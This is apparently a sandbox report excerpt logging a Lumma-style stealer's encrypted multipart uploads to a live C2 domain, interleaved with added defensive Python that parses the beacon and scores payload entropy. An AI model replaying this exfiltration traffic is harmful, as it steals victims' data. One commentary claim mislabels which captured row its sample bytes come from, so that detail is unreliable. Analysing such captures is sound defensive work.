2024-11-23 12:57:46 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: eok 8.46.123.75
2024-11-23 12:57:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
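The five sessions above all follow one shape: a multipart POST to /api carrying an `hwid`, a `pid` and a `lid` part (here always `LOGS11--LiveTraffic`), answered with a chunked body that decodes to `ok <ip>`. The script below is an added worked example, not code from the Joe Sandbox report or from the malware: it parses a request constructed to mirror session 2 (request line, headers, boundary and the three visible parts are copied from the report; the stolen-data part that follows them in the real traffic is omitted, so no Content-Length is sent), decodes the captured reply bytes, and reports which of the indicators seen in this capture matched. The function names, the `SAMPLE_*` constants and the indicator regexes are this example's own, and the regexes are a heuristic drawn from these five sessions, not a vetted signature.

```python
"""Added example: parse a Lumma-style multipart beacon and its chunked reply.
SAMPLE_REQUEST mirrors session 2 of the report (stolen-data part omitted);
SAMPLE_RESPONSE_BODY is the captured reply byte for byte. Names are our own."""
import re
from typing import Dict, List, Tuple

SAMPLE_REQUEST = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: multipart/form-data; boundary=8YZHJO8XC3M\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Host: property-imper.sbs\r\n"
    b"\r\n"
    b"--8YZHJO8XC3M\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"B1B7719ECE567286D7CBBD6DF28D3732\r\n"
    b"--8YZHJO8XC3M\r\n"
    b'Content-Disposition: form-data; name="pid"\r\n\r\n'
    b"2\r\n"
    b"--8YZHJO8XC3M\r\n"
    b'Content-Disposition: form-data; name="lid"\r\n\r\n'
    b"LOGS11--LiveTraffic\r\n"
    b"--8YZHJO8XC3M--\r\n"          # closing delimiter (not shown in the truncated capture)
)
# Captured reply: "e\r\n" announces a 0xe-byte chunk, "0\r\n\r\n" is the last-chunk.
SAMPLE_RESPONSE_BODY = b"e\r\nok 8.46.123.75\r\n0\r\n\r\n"

# Heuristic indicators taken from the five sessions above (our own, not a signature).
HWID_RE = re.compile(rb"^[0-9A-F]{32}$")
LID_RE = re.compile(rb"^[A-Za-z0-9]+--[A-Za-z0-9]+$")
OK_REPLY_RE = re.compile(rb"^ok (?:\d{1,3}\.){3}\d{1,3}$")


def parse_http_request(raw: bytes) -> Tuple[bytes, bytes, Dict[str, bytes], bytes]:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers: Dict[str, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii")] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: bytes) -> Dict[str, bytes]:
    """Return {part name: raw value} for a multipart/form-data body (RFC 7578 framing)."""
    delimiter = b"--" + boundary
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:      # element 0 is the (empty) preamble
        if part.startswith(b"--"):              # "--boundary--" closes the body
            break
        part = part[2:] if part.startswith(b"\r\n") else part   # CRLF after delimiter
        part = part[:-2] if part.endswith(b"\r\n") else part    # CRLF before next one
        part_headers, sep, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', part_headers)
        if sep and match:
            fields[match.group(1).decode("ascii")] = value
    return fields


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; ValueError if it is truncated."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        size = int(body[pos:eol].split(b";")[0], 16)   # drop any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out)
        if len(body) < pos + size + 2:
            raise ValueError("truncated chunk data")
        out += body[pos:pos + size]
        pos += size + 2                                # skip the data and its CRLF


def analyse_exchange(raw_request: bytes, raw_response_body: bytes) -> dict:
    """Extract the beacon fields and list which Lumma-like indicators matched."""
    method, path, headers, body = parse_http_request(raw_request)
    ctype = headers.get("content-type", b"")
    m = re.search(rb"boundary=([^;\s]+)", ctype)
    fields = parse_multipart(body, m.group(1)) if m else {}
    reply = decode_chunked(raw_response_body)
    reasons: List[str] = []
    if method == b"POST" and path == b"/api" and ctype.startswith(b"multipart/form-data"):
        reasons.append("multipart POST to /api")
    if HWID_RE.match(fields.get("hwid", b"")):
        reasons.append("32-hex-digit 'hwid' part")
    if LID_RE.match(fields.get("lid", b"")):
        reasons.append("'lid' part of the form NAME--NAME")
    if OK_REPLY_RE.match(reply):
        reasons.append("reply is 'ok <ip>'")
    return {
        "fields": {k: v.decode("latin-1") for k, v in fields.items()},
        "reply": reply.decode("latin-1"),
        "lumma_like": len(reasons) >= 3,   # threshold chosen for this example
        "reasons": reasons,
    }


if __name__ == "__main__":
    print(analyse_exchange(SAMPLE_REQUEST, SAMPLE_RESPONSE_BODY))
```

Run against a real pcap, `parse_multipart` is the piece to keep: it tolerates the `--` inside `LOGS11--LiveTraffic` because it splits only on the full `--<boundary>` delimiter, and `decode_chunked` raises rather than silently returning a partial reply when a capture is cut short, which is the failure mode a sandbox export like this one is prone to.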


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.649729104.21.33.1164434392C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 12:57:48 UTC279OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=M6P2U4PWMUOP
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 571390
                                                                                        Host: property-imper.sbs
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: 2d 2d 4d 36 50 32 55 34 50 57 4d 55 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 42 37 37 31 39 45 43 45 35 36 37 32 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4d 36 50 32 55 34 50 57 4d 55 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 36 50 32 55 34 50 57 4d 55 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4d 36 50 32 55 34 50 57
                                                                                        Data Ascii: --M6P2U4PWMUOPContent-Disposition: form-data; name="hwid"B1B7719ECE567286D7CBBD6DF28D3732--M6P2U4PWMUOPContent-Disposition: form-data; name="pid"1--M6P2U4PWMUOPContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--M6P2U4PW
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: ac bc 51 6a 8a 9e d4 95 c4 f2 c9 b8 ba e4 62 46 e5 67 e9 a2 11 3e a3 87 e1 87 7a b1 b1 e2 0f 8a b8 c5 78 30 8e 6a 9f e2 fd 32 54 a5 1b 24 70 ee 48 11 af 42 44 56 bc fe 0d 13 42 ff fe 68 d8 4f 62 56 88 ce 40 b5 4f ae 8b f5 15 0d 47 32 44 88 6a ba 53 06 00 63 7b a2 02 77 9a 44 c9 98 37 32 8c 89 b0 27 3c 4f b6 56 a5 f7 2d 99 c3 31 83 30 5b 48 70 4b 02 d3 87 86 e3 b9 b7 22 35 3e 5e 1f b7 8d 53 1f 57 7a f9 c5 81 f9 cc c1 9a 65 4f 97 8e db be e5 f7 78 0e 0e 4a 3b 71 e3 45 ad 1f f8 ae 55 68 6e 2c fd 71 97 db 91 00 65 a2 22 59 61 24 58 60 9a 92 af e9 da 40 ea c0 5e 64 64 f7 fb 49 ee 34 4a 9b df b0 e0 1e 1a 8b de ae 0f db 67 69 88 85 67 f1 25 94 e4 15 f6 95 62 48 52 e9 eb ab 96 17 cd d4 0a be 58 f7 f4 7b 72 7f 4c ce d7 fd 5a 7f 2a 3d 1c 11 9a 88 dd 55 5a 12 49 12
                                                                                        Data Ascii: QjbFg>zx0j2T$pHBDVBhObV@OG2DjSc{wD72'<OV-10[HpK"5>^SWzeOxJ;qEUhn,qe"Ya$X`@^ddI4Jgig%bHRX{rLZ*=UZI
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: fa 35 f3 81 96 94 82 4a 76 f3 44 e7 a3 8f e1 15 a2 b7 e9 3f 7c 45 a3 5e 94 f2 de ff 88 24 74 75 b0 5f 38 10 3c 7a 3b 0d e7 0f 64 ae 2d bc 19 ae ee fd a0 4a 6a 38 b2 fb 0e bb b3 ac 76 3c b1 da ab a8 6a 7e 3d 64 d8 ab 6c 64 32 9c bb 92 59 55 b5 b0 f9 21 c4 6f f6 68 19 f9 cb df af 21 c6 bb 00 ee 27 27 ad 9f 66 01 ff fd c8 2c 5f e9 d0 57 87 eb 0a b8 8b e7 59 83 99 81 3b 43 5f c4 9c 37 0e 29 c8 49 2d 6d fe b8 bd 46 1f fd 57 4d d8 c4 f9 eb eb 8d 0c d1 b1 e5 fb 0e d5 f3 df c2 59 63 4f 05 6b 3a 7e af 99 fc 49 e1 5b 0d a7 a3 8a 59 a4 3d 37 92 f6 d0 bb fc 55 6e 5f 1f 16 b6 32 e6 94 38 54 dd 7d 37 54 72 f3 9f 21 f6 7a 55 3d 7f 0e 4b 39 6c 34 f2 ab 87 81 45 79 47 e4 83 fd de 41 41 b0 5f e3 e4 b3 1d 46 de 9f f6 61 60 6e d5 3e c6 99 fc 38 8f 7d 0c f2 99 e3 20 d4 eb 57
                                                                                        Data Ascii: 5JvD?|E^$tu_8<z;d-Jj8v<j~=dld2YU!oh!''f,_WY;C_7)I-mFWMYcOk:~I[Y=7Un_28T}7Tr!zU=K9l4EyGAA_Fa`n>8} W
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: 82 f9 71 a1 52 df 15 d2 a4 76 e8 4f 2c 76 3b c0 87 ff d2 e6 9f f4 55 af 6f 7c c9 8d 63 0a 58 17 22 59 15 73 af 1c 93 c5 c4 fb 22 36 49 ba 69 29 d5 95 32 9e 0d bd 01 45 cd d0 bf cc 89 3f 5b 60 a9 cf f2 29 8c 36 e3 67 13 0e 03 cc ba 3f a3 e9 9e 5b a7 0f 37 f2 ce 7f 45 45 5a 3f df 21 f9 62 06 00 cf 4e c5 19 cc 57 4e d6 3d ff cd 65 fd 37 91 d3 a7 7d 4b 29 59 1b dd b4 cb 7a e3 3d 2d a3 2f 24 7d cf 85 c1 9f 57 e3 d9 30 c4 2d 19 c5 79 ac ba 1d d3 81 77 71 c1 93 af 2e 98 19 ac c8 da 8e da 51 1d 1c 2d 71 36 2a 20 99 bb ec 69 ba 76 ef 0b f5 27 6b 20 cf 94 3e f7 a8 78 e7 ee fe af 43 f6 db 01 fa 3b 85 25 60 38 f1 33 92 44 53 a0 19 f1 03 5d 7e 28 9a 17 4c 94 67 6b a0 bb 79 98 b3 08 a0 84 a4 e0 af 49 1d 4f e6 af ca 94 00 9a 70 04 04 7a 84 ce 15 f3 40 39 fc ed 68 84 10
                                                                                        Data Ascii: qRvO,v;Uo|cX"Ys"6Ii)2E?[`)6g?[7EEZ?!bNWN=e7}K)Yz=-/$}W0-ywq.Q-q6* iv'k >xC;%`83DS]~(LgkyIOpz@9h
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: ea c0 b1 c1 21 26 67 f1 b8 26 44 3b c3 6b 37 cd 76 4b 0c ff ba 94 a4 8e e9 d3 10 07 2e 4f a5 4e 5f 05 53 ac 1d 9e fa 07 da ba 89 2d e6 57 a8 ea 17 6a 0c aa 8d 5a 19 2b 11 ad ff db ba 8e e0 ba 6b 99 71 2a 3c 42 a5 ea 74 26 06 64 95 23 de fc 3f a1 fa ff e4 6c 03 38 cd cc 96 22 02 e6 30 e0 1a 7a 6a c4 5e 12 6a 7a b9 dd f5 8b 13 b0 80 03 72 0c 09 d9 0d 3b 96 08 10 ba 9d af 0a 05 29 c1 e9 c2 2b 06 80 8c 08 13 05 07 ba ee 00 d3 ee fa 60 0c 5b 0d d5 72 ca df a8 70 a8 65 0e ff cf 24 aa 17 7d 74 a8 55 bc 00 19 f3 4a 82 fc c1 0c c2 c9 67 d4 85 18 7d 97 0b 7a 3d 9b ef 2e 8a 23 ca 90 d3 b4 d8 56 5c af a3 70 f2 a0 61 4a 75 ac d2 0d d1 29 94 80 05 91 8a d8 3c bc d4 4e 47 10 d9 17 7d ac 37 67 3f 6e 86 eb 72 77 d6 2a a8 b0 29 20 56 72 12 37 f7 fa 21 9b ad 11 47 87 6f f1
                                                                                        Data Ascii: !&g&D;k7vK.ON_S-WjZ+kq*<Bt&d#?l8"0zj^jzr;)+`[rpe$}tUJg}z=.#V\paJu)<NG}7g?nrw*) Vr7!Go
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: 85 97 34 b2 e0 37 ad 9a 80 ba a2 d9 48 85 18 6c ee 32 77 0d 0e 3e a1 65 09 69 5a 92 20 28 7f 2e f7 bf 75 76 fd 76 cd bc c2 65 70 c7 ef 19 9f ef c8 38 cc 1f e9 7f 67 26 0a 00 c0 11 06 1a 89 50 28 60 ae 4f 4d 3d 18 49 3b 0f e7 87 d7 61 4f 28 37 3a 6f f7 40 5c f5 fe c3 06 60 0d 9b a7 c0 ab 3f 46 6e 0e 51 04 c0 ab a5 36 24 5d 81 45 4f 09 fd 55 7a c0 00 3b 15 a0 81 84 78 11 87 10 26 54 fa 3d 26 f7 34 21 26 b2 da f7 4b ab c0 0b 7d 6f c9 9b 2d 23 7f df b0 63 55 75 1c 72 14 16 ae 7f ae 77 ab f4 fa 1b 88 3c be 71 79 8f 0c d0 be 39 34 f1 0f 66 e3 2b c4 28 ab 3e 86 63 08 8e e9 60 84 a0 85 46 a1 5e c9 9f b2 f4 c6 3d 97 ce e4 62 7d 0b 0b 6a 08 fc 73 70 7c 62 99 8e 68 78 7d 1b 6c 97 8d ca 43 64 f5 c5 83 d8 ce bf 92 93 bf 82 ec 40 f0 c6 94 54 34 f0 8a 71 16 90 f3 f0 57
                                                                                        Data Ascii: 47Hl2w>eiZ (.uvvep8g&P(`OM=I;aO(7:o@\`?FnQ6$]EOUz;x&T=&4!&K}o-#cUurw<qy94f+(>c`F^=b}jsp|bhx}lCd@T4qW
                                                                                         2024-11-23 12:57:48 UTC | 15331 | OUT | Data Raw: c8 07 71 ed 07 e6 94 19 a1 ee 44 81 41 7c 6a dd 71 9f b5 7d 2d 66 2a 92 9b 80 5a 91 fb 52 b6 9b 0d 07 41 9d 5a 4c a9 7e 01 ef 49 ae df 9e 62 6c 48 eb fc 17 ba 20 23 a9 98 8b 45 29 da f1 20 0e 4a d6 d7 3e 84 c8 ec 02 b6 4b ea 96 07 c4 30 30 fe 6c b8 bd 29 a1 d2 ea b9 38 fc 59 20 8d f5 db 95 f5 fb 9f ba 9a 67 11 dc cd 9c ed 49 8e d2 1b d7 1a 45 8e 59 30 4b 61 e1 c8 c6 1e 6b b6 79 fc 62 38 ab 2d 71 47 3d 86 a2 3e c4 a0 32 08 e3 8d 7f bf 7d f1 eb 85 0d dd ee 15 ac fb cc 6b dc 65 64 ff 29 75 a3 d5 19 fa 32 eb 9f dd 52 03 54 55 86 0e 76 aa 87 07 d4 2c 7f ff e9 79 f3 52 88 a5 15 a1 28 6e b3 02 13 35 ff 46 f5 f4 fd 13 77 e6 9d fa 3c fd 72 7b 9e b6 08 04 d0 7d 6f 2a 05 e2 b5 c5 65 d7 94 f6 a2 f0 d1 ab 85 8f 2a 50 d9 57 82 18 a3 c7 d4 c2 7a bf 0b 7a ab fd 31 c9 a3
                                                                                        Data Ascii: qDA|jq}-f*ZRAZL~IblH #E) J>K00l)8Y gIEY0Kakyb8-qG=>2}ked)u2RTUv,yR(n5Fw<r{}o*e*PWzz1
                                                                                         2024-11-23 12:57:48 UTC | 15331 | OUT | Data Raw: fb e8 dc 10 7f 86 54 e5 a3 0c 7f d3 f8 5c 9d b6 32 77 68 72 4e 87 b9 7b f8 db ea 51 7e ce 90 c9 cc b1 fa 9b ec 6a 52 b0 e0 bb ed 20 5d 42 1d 3a d6 04 c0 51 1d 30 dd b9 b3 22 0e 22 39 c7 bc f6 60 f5 bc 99 04 68 19 51 a1 d5 dc bf 4f 7b 20 6a 1a fe 9d bb 4f 25 b5 40 c2 75 eb 8b 47 ae 35 c8 78 99 de df 22 d1 22 56 df cc 14 17 a7 88 ac 1c cf 2e ec ab 6c 78 5e 58 fc d3 1a c1 94 46 65 7c 6e 60 fd 27 04 0f 47 c3 27 44 81 1d fb 03 24 78 52 51 a5 07 90 a0 53 0a 34 9b f6 da 6d 4e 92 8c 84 a8 e4 16 0b c0 7c 75 7f 30 e8 6b 5d 25 4c 91 4e 08 40 c0 89 9c 17 4f 6a 7c b8 57 31 7c 1f 69 a7 31 64 d0 ed 8d b3 20 5d 13 77 19 03 09 03 19 9e 06 d0 d2 5f 7f 88 65 b8 39 1e 80 87 f5 87 98 5e 12 8f 2b cb 24 81 10 d3 51 9a ce 44 37 e9 23 98 0c de 1a e6 ec 25 f6 e5 bd 8c fd bc 73 e4
                                                                                        Data Ascii: T\2whrN{Q~jR ]B:Q0""9`hQO{ jO%@uG5x""V.lx^XFe|n`'G'D$xRQS4mN|u0k]%LN@Oj|W1|i1d ]w_e9^+$QD7#%s
                                                                                         2024-11-23 12:57:48 UTC | 15331 | OUT | Data Raw: df ec 51 5e c2 bd 62 45 7b 25 63 68 ea 08 c8 53 88 0b ed 72 d9 78 3f f7 32 c8 68 57 aa 0d 3a ec 65 93 ee 18 77 30 23 d5 3e 33 72 bf 6c b3 ad de 93 ea a7 98 7e 25 15 38 00 3a f8 d7 3f ba 51 c4 6c d5 61 e6 59 c4 df 57 30 c9 f3 8c 74 76 2e 0b ef ed 03 fd 5a 2d 4c 42 d6 a1 b1 d9 b9 c0 c1 39 aa 0b d1 fc 80 3e 29 54 2f e1 d0 86 a0 28 2f 98 e6 10 53 12 15 5e 7f 21 cc 8d 8a 52 8c f9 d2 ab 6f ff 92 bf 46 69 b8 0d 61 85 85 62 4e 38 0c 55 bd 7c 82 6f e1 d5 29 53 dc 8a 8c e4 3b ce 87 f5 ca 50 55 99 59 07 c3 8c f8 ad 2d e0 19 63 47 cf db 89 f1 e1 f0 ea 93 3f 74 a3 48 1d 2c 54 2c e3 c5 12 17 0b 8a 65 4a 85 d7 cf 5a 50 55 d1 d7 10 94 e6 15 81 67 92 5c d5 20 a1 b8 75 6f 57 26 e8 05 01 02 dc 77 da 82 72 3f b6 9d d5 b4 8b 44 7a 04 eb e3 9a 57 b5 99 aa 6a 2a 39 59 57 c7 7e
                                                                                        Data Ascii: Q^bE{%chSrx?2hW:ew0#>3rl~%8:?QlaYW0tv.Z-LB9>)T/(/S^!RoFiabN8U|o)S;PUY-cG?tH,T,eJZPUg\ uoW&wr?DzWj*9YW~
                                                                                         2024-11-23 12:57:48 UTC | 15331 | OUT | Data Raw: 31 09 36 36 a4 59 67 0c f5 fa 6c 16 a0 d4 0a 92 36 61 48 98 a3 05 ea 43 67 86 ab 9b 21 2a 0e 91 8c e1 b9 be 9b 9f 6a f9 ba 30 ef 3b c8 1f ea 5d 1c f0 f3 0c 9f eb 5d ad da 7b 5a 2b 68 f6 33 d9 6f 16 43 1f 32 e7 c4 64 9d 6a a4 d3 fd 5e f9 b3 b9 77 fd d9 3c 83 b1 59 5d 0a 4b 9d f8 9f da c0 5e e2 17 f4 38 db 07 e2 d3 c4 28 e3 10 ab db 86 3c 65 3e ff a1 b0 f4 77 b0 fb b8 f8 c7 89 f5 37 28 e0 36 3c 38 c0 be 0e e4 49 d9 d5 91 33 8d b3 1b 8e f4 a1 fe 70 56 3b 0b 81 02 e1 fe cb 0b d7 36 22 dc 6f 03 bd 52 20 28 08 dc 87 3d 27 11 f0 c0 4e 17 78 e0 0f 98 3f 2c 70 0b 8f ab ae d6 3a 16 ce 49 80 c8 72 19 b0 42 e0 f7 ed 9c 15 04 fd a8 d5 98 a5 94 f9 b9 07 9e 8f fd ec cd 96 ef 39 57 de 28 2e 6f b2 62 46 3a 27 7e b8 08 0c cf 10 68 4f 00 eb 7e 34 ec bc 0b 64 ec 71 f8 df 71
                                                                                        Data Ascii: 166Ygl6aHCg!*j0;]]{Z+h3oC2dj^w<Y]K^8(<e>w7(6<8I3pV;6"oR (='Nx?,p:IrB9W(.obF:'~hO~4dqq
                                                                                         2024-11-23 12:57:51 UTC | 1023 | IN | HTTP/1.1 200 OK
                                                                                        Date: Sat, 23 Nov 2024 12:57:51 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=v2kic98gfm2kotssi4m84835af; expires=Wed, 19-Mar-2025 06:44:28 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3UdAcmuNd989qOeIinlM%2F4sMLBwgyxJeRxg6ISCIUO3w6pFoQv9BnTnVMO6XdzAPwx4sANiQCKqku1MtSizwCnHc%2BBO%2ByLKFOPwqdzhBZqmmq%2BhrKSSNfFfiday6VOElGXFFLA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e7153bc2f53729b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1796&sent=201&recv=593&lost=0&retrans=0&sent_bytes=2844&recv_bytes=573933&delivery_rate=1566523&cwnd=249&unsent_bytes=0&cid=aa9f649dc20f200d&ts=3642&x=0"
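The outbound rows above carry a large body that the report renders only as hex and a printable-character sieve; the server answers 200 OK and sets a PHP session cookie, so the exchange looks like a regular form post to a web backend. The check an analyst wants here is whether that body is plaintext form data (inspectable, signature-friendly) or an encrypted or compressed blob (only size, timing and destination are left to detect on). The Python below is an added example, not code from the report or from Joe Sandbox: it parses rows in the fused shape the stream table is rendered in ("<timestamp> UTC<counter><IN|OUT>Data Raw: <hex>"), decodes the bytes and scores them by Shannon entropy and printable ratio. REPORT_ROW holds the first 32 bytes of the first outbound row exactly as shown; the encrypted-looking and plaintext bodies it is compared against are constructed stand-ins, and the 7.5 bits/byte and 50 percent thresholds are working assumptions, not values from the report.

```python
"""Entropy check over the raw bytes of a sandbox HTTP stream row (added example)."""
import hashlib
import math
import re
from collections import Counter

# Row shape as the report's HTTP stream table is rendered: the timestamp, transfer
# counter and direction cells are fused, followed by the hex dump of the segment.
ROW_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) UTC"
    r"(?P<counter>\d+)(?P<direction>IN|OUT)Data Raw: "
    r"(?P<hex>[0-9a-fA-F]{2}(?: [0-9a-fA-F]{2})*)\s*$"
)

# First 32 bytes of the first outbound row shown in the report (real data, truncated).
REPORT_ROW = (
    "2024-11-23 12:57:48 UTC15331OUTData Raw: "
    "ea c0 b1 c1 21 26 67 f1 b8 26 44 3b c3 6b 37 cd "
    "76 4b 0c ff ba 94 a4 8e e9 d3 10 07 2e 4f a5 4e"
)


def parse_row(line: str):
    """Return (timestamp, counter, direction, payload bytes), or None for non-data rows."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    payload = bytes.fromhex(m.group("hex").replace(" ", ""))
    return m.group("ts"), int(m.group("counter")), m.group("direction"), payload


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 8.0 is the ceiling for byte data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII (0x20-0x7e) or tab/LF/CR."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D))
    return ok / len(data)


def looks_encrypted(data: bytes, entropy_floor: float = 7.5, printable_ceiling: float = 0.5) -> bool:
    """Heuristic (assumed thresholds): encrypted or compressed bodies sit near 8 bits/byte
    and are mostly non-printable. Apply to bodies of a few hundred bytes or more; a
    short excerpt such as REPORT_ROW underestimates entropy simply because few bytes
    cannot populate all 256 symbols."""
    return shannon_entropy(data) >= entropy_floor and printable_ratio(data) <= printable_ceiling


def _constructed_random(n: int, seed: bytes = b"constructed-sample") -> bytes:
    """Deterministic pseudo-random bytes standing in for an encrypted body (constructed)."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed stand-ins: one encrypted-looking body, one plaintext multipart body.
CONSTRUCTED_ENCRYPTED = _constructed_random(4096)
CONSTRUCTED_PLAINTEXT = (
    b"--boundary\r\nContent-Disposition: form-data; name=\"hwid\"\r\n\r\nAAAA-BBBB\r\n" * 40
)

if __name__ == "__main__":
    ts, counter, direction, payload = parse_row(REPORT_ROW)
    print(ts, counter, direction, len(payload), "bytes decoded")
    for label, body in (("report excerpt (32 bytes)", payload),
                        ("constructed encrypted", CONSTRUCTED_ENCRYPTED),
                        ("constructed plaintext", CONSTRUCTED_PLAINTEXT)):
        print(f"{label}: entropy={shannon_entropy(body):.2f} "
              f"printable={printable_ratio(body):.2f} encrypted?={looks_encrypted(body)}")
```

To run it over the full stream, feed every "Data Raw" row of one direction through parse_row, concatenate the payloads, and score the whole body once; a near-8 result with a 200 OK and a fresh session cookie in reply is the pattern to hunt for in proxy logs when the body itself cannot be matched.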

                                                                                         Target ID: 0
                                                                                         Start time: 07:57:29
                                                                                         Start date: 23/11/2024
                                                                                         Path: C:\Users\user\Desktop\file.exe
                                                                                         Wow64 process (32bit): true
                                                                                         Commandline: "C:\Users\user\Desktop\file.exe"
                                                                                         Imagebase: 0x960000
                                                                                         File size: 1'852'416 bytes
                                                                                         MD5 hash: 44EB876D74E66BC5879D4AC1B636EAF1
                                                                                         Has elevated privileges: true
                                                                                         Has administrator privileges: true
                                                                                         Programmed in: C, C++ or other language
                                                                                         Reputation: low
                                                                                         Has exited: true

                                                                                        No disassembly